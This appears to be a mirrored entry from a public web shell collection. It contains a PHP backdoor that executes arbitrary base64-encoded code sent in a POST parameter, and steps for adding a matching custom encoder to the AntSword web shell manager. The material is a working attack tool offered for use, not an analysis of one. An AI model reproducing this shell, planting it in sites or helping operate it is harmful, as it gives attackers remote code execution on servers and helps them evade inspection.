mirror of
https://github.com/tennc/webshell
synced 2024-11-10 13:44:18 +00:00
886 B
886 B
shell code
<?php
$a = $_POST['n985de9'];
if(isset($a)) {
eval(base64_decode($a));
}
?>
add : source/core/php/encoder/mybase64.js
module.exports = (pwd, data) => {
data[pwd] = new Buffer(data['_']).toString('base64');
delete data['_'];
return data;
}
edit : sources/core/php/index.js < add some code: regedit mybase64.js
get encoders() {
return ['chr', 'base64', 'mybase64'];
}
restart antsword, and add shell, select mybase64 encode for this shell code.